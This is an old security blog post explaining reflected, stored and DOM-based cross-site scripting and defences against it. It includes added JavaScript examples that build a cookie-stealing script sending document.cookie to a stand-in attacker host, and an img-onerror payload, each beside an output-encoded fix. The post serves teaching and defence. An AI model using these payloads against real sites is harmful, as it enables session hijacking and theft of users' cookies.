Thursday, December 9, 2010

Security Review on Cross-site scripting (XSS)

Cross-site scripting (XSS) is a security vulnerability in web applications that allows attacker-controlled client-side script to be injected into web pages and executed in the browsers of the users who view them. Like the SQL injection covered in my last blog post, it is an injection flaw: untrusted input is mixed into code (here HTML and JavaScript) without being encoded for the context it lands in. In recent years XSS has surpassed buffer overflows as the most commonly reported class of vulnerability: according to the sources listed below, roughly 80% of the security vulnerabilities documented by Symantec as of 2007 were XSS, and researchers claim that up to 68% of websites carry at least one XSS flaw. Facebook, MySpace, Twitter and other top websites have all been compromised through XSS attacks.

XSS exploits attack the client side: the injected script runs in the victim's browser with the origin of the vulnerable site, so the same-origin policy and other client-side protections do not stop it, and it can read cookies, page contents and anything else the site's own scripts can. XSS attacks are usually divided into three categories: non-persistent (reflected), persistent (stored), and the newer DOM-based variety. I will discuss the traditional non-persistent and persistent attacks first and then the DOM-based vulnerabilities.

The most common type of XSS attack is the non-persistent (reflected) one. Typically, a website presents a form where the user types some text, and the server immediately processes the text and displays it on the resulting page. If the text contains HTML and the server does not encode the HTML control characters (<, >, &, and quotes) before writing the text back into the page, the browser interprets the input as markup rather than text, and an XSS vulnerability has been found. An example is typing a string of text into a search engine, which usually displays it on the results page ("Results for: ..."). By itself this harms nobody but the user who typed the HTML, but the search term also arrives through the URL's query string, which is reflected exactly like form input. An attacker who embeds the same payload in a link to the vulnerable site and gets somebody else to click it has the script run in the victim's browser. If the victim is logged in to that site, the script can read the session cookie and send it to the attacker, who then replays it to take over the victim's session.
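The reflected search-page flaw described above, as an added example that is not part of the original post: a hypothetical Node-style handler that reflects the `q` parameter verbatim, beside the output-encoded fix, both fed the same constructed attack link. The hosts, paths and parameter names are invented for the illustration.

```javascript
// Added example (not from the original post): a reflected XSS flaw in a
// hypothetical search page, next to the output-encoded fix. Hosts, paths
// and parameter names are made up for the illustration.

// Encode the characters that let text break out of an HTML element body
// or a double- or single-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable handler: the search term is written straight into the HTML.
function renderSearchVulnerable(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// Fixed handler: the same page, but the term is encoded as it enters HTML.
function renderSearchFixed(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Stand-in for the server: pull ?q= out of the requested URL and render.
// The query string is reflected exactly like a submitted form field.
function handleSearchRequest(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return render(q);
}

// Constructed attack link. The payload sends the victim's cookies to the
// attacker's (hypothetical) host; it runs only if the victim opens the link.
const cookieStealer =
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';
const attackLink =
  'http://victim.example/search?q=' + encodeURIComponent(cookieStealer);

// True when the rendered page contains the injected script tag unencoded.
function pageExecutesPayload(html) {
  return html.includes('<script>');
}

// Run both handlers against the same attack link.
function demo() {
  const vulnerable = handleSearchRequest(attackLink, renderSearchVulnerable);
  const fixed = handleSearchRequest(attackLink, renderSearchFixed);
  return {
    vulnerableExecutes: pageExecutesPayload(vulnerable), // true
    fixedExecutes: pageExecutesPayload(fixed),           // false
    fixedHtml: fixed, // the payload survives only as &lt;script&gt;... text
  };
}

console.log(demo());
```

The fix encodes on output, at the point where the value enters HTML, rather than trying to filter "bad" input on the way in; the same `escapeHtml` applies to stored input when it is later rendered, which is why it covers the persistent case as well.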

Persistent (stored) XSS attacks are more severe and more indirect than non-persistent ones. When a server takes input from a user and permanently stores it for display on a web page (such as a Facebook profile or an online forum where users are allowed to post HTML), every user who later views that page is attacked if the website did not encode the HTML control characters when rendering the stored content. The attacker does not have to trick each victim into clicking a link; the payload simply waits on the page. As before, the injected script can steal each victim's session cookie and give the attacker full access to their session.

In recent years, Web 2.0 applications, which update page content dynamically without the user having to hit the refresh button, have been subject to DOM-based XSS vulnerabilities. DOM stands for "Document Object Model", the browser's programmatic view of the HTML page that scripts read and modify. JavaScript is the client-side scripting language of the web, and Ajax (Asynchronous JavaScript and XML) uses the XMLHttpRequest object to make HTTP requests to the server in the background and write the results into the DOM without leaving the page. In a DOM-based XSS attack the vulnerable code is this client-side JavaScript rather than the server: the page's own script takes attacker-influenced data from a source such as the URL fragment (everything after '#'), document.URL or document.referrer and writes it into the page through a sink such as innerHTML, document.write or eval without encoding it. Because the payload can live entirely in the fragment, which the browser never sends to the server, server-side input filtering and server logs never see it.
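The DOM-based case described above, as an added example that is not from the original post: a hypothetical welcome page whose own script reads the visitor's name from the URL fragment and writes it into the page. The vulnerable `innerHTML` sink sits beside two fixes, and a helper shows what the server would have received for the same attack URL. Hosts and parameter names are invented, and a plain object stands in for a DOM element so the flow can be exercised outside a browser.

```javascript
// Added example (not from the original post): a DOM-based XSS flaw in a
// hypothetical welcome page that reads name=... from the URL fragment.
// Hosts and parameter names are invented for the illustration.

// What the server receives for a URL: scheme, host, path and query string.
// The fragment (everything after '#') stays in the browser, so a payload
// placed there never reaches server-side filters or logs.
function serverSideView(pageUrl) {
  const u = new URL(pageUrl);
  return u.origin + u.pathname + u.search;
}

// Source: read name=... from the fragment, as the page's script does.
function nameFromFragment(hash) {
  const params = new URLSearchParams(hash.replace(/^#/, ''));
  return params.get('name') || 'guest';
}

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable sink: assigning markup to innerHTML makes the browser parse
// it, so an <img onerror=...> or similar in the name runs as script.
function greetVulnerable(el, name) {
  el.innerHTML = '<h1>Welcome, ' + name + '</h1>';
}

// Fix 1: write the name as text; the browser never parses it as markup.
function greetWithText(el, name) {
  el.textContent = 'Welcome, ' + name;
}

// Fix 2: if markup around the name is needed, encode the name first.
function greetWithEncoding(el, name) {
  el.innerHTML = '<h1>Welcome, ' + escapeHtml(name) + '</h1>';
}

// Constructed attack URL. A <script> tag inserted via innerHTML does not
// execute, so DOM payloads typically use an event-handler attribute.
const attackUrl =
  'http://victim.example/welcome.html#name=' +
  encodeURIComponent('<img src=x onerror="alert(document.cookie)">');

// Minimal stand-in for a DOM element; a real page would use
// document.getElementById(...).
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

function demo(url) {
  const name = nameFromFragment(new URL(url).hash);
  const bad = fakeElement(), text = fakeElement(), enc = fakeElement();
  greetVulnerable(bad, name);
  greetWithText(text, name);
  greetWithEncoding(enc, name);
  return {
    serverSees: serverSideView(url), // no trace of the payload
    vulnerableHtml: bad.innerHTML,   // contains the live <img onerror=...>
    textOnly: text.textContent,      // same string, but rendered as text
    encodedHtml: enc.innerHTML,      // &lt;img ... encoded
  };
}

// Browser entry point for the real page (inert under Node).
if (typeof document !== 'undefined') {
  greetWithText(document.getElementById('greeting'), nameFromFragment(location.hash));
}
```

The point the example makes is that `serverSideView(attackUrl)` contains nothing suspicious: a scanner or filter that only inspects what the server receives cannot see this bug, so the fix has to be made in the client-side code that touches the sink.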

There are a few steps that users and website developers can take to defend against XSS attacks. The first is for developers to encode (escape) untrusted data on output, at every place it is written into a page, so that the browser treats it as text rather than markup. If the website's function is to let users submit HTML (such as for formatting their profile page on MySpace), then the developers must run the untrusted HTML through an HTML sanitizer or policy engine that allows only a fixed list of harmless tags and attributes; blacklisting known-bad tags does not work, because attackers have far too many ways to smuggle script past a blacklist. Another measure developers can take to protect their users' accounts is to tie each session to the IP address the user logged in from, so that a cookie stolen through XSS is rejected when it is replayed from the attacker's machine. This only helps against attackers outside the victim's network (NAT puts many users behind one address) and it breaks sessions for users whose address changes, so it supplements output encoding rather than replacing it. Marking the session cookie HttpOnly, so that document.cookie cannot read it, likewise blocks the specific cookie-theft payloads described above but not everything an injected script can do.

One thing users can do to protect themselves from XSS is to disable scripting in their browsers. They may also keep a list of trusted or untrusted domains in the browser so that scripting is enabled or disabled depending on the domain they are visiting. This approach is of limited use, however, because many websites across the internet require scripts to function properly, and a trusted site that itself has an XSS hole will still run the injected script.

Looking into the future, scanning technologies are emerging that test websites for XSS vulnerabilities and let developers fix the holes before attackers find them. These scanners are not perfect: they cannot find every vulnerability in a site (DOM-based flaws in particular are hard for a scanner that only looks at server responses to see), so a clean scan is not proof of a clean site.

If you are a website developer, it is important to know the risks and understand how XSS works so that you can secure your website as much as possible. Set up a sandbox website of your own and test your skills there (and only there). If you are completely new to XSS, start with an introduction to the basics; if you are already familiar with it, look at a cheat sheet of the more advanced tricks. The sources listed below cover both.

Sources:
http://www.ihtb.org/security/xss_hacking_exposed.txt
http://en.wikipedia.org/wiki/Cross-site_scripting
http://ha.ckers.org/xss.html
